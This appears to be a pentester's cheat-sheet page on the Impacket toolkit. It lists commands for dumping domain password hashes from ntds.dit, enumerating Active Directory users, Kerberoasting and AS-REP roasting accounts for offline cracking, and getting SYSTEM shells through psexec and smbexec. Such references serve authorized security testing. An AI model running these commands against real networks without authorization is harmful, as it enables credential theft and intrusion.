Impacket

Impacket is a collection of Python classes for working with network protocols.

• GitHub - SecureAuthCorp/impacket

• Fun with network protocols, using Python and Impacket | Andrea Fortuna

Related

• Active Directoy

• TCP 88: Kerberos

• TCP 389, 636, 3268, 3269: LDAP

Dump hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Users

This script will gather data about the domain’s users and their corresponding email addresses.

GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>

This example will try to find and fetch Service Principal Names that are associated with normal user accounts.

GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip> 

-> Crack hash e.g. using hashcat, to obtain passwords

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.

samrdump.py <domain>

This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.

GetNPUsers.py <domain>/<user> -no-pass

-> Crack hash e.g. using hashcat

Shell (psexec.py)

PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"

sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>

SMB (smbexec.py)

sudo smbexec.py <user>:<pw>@<target>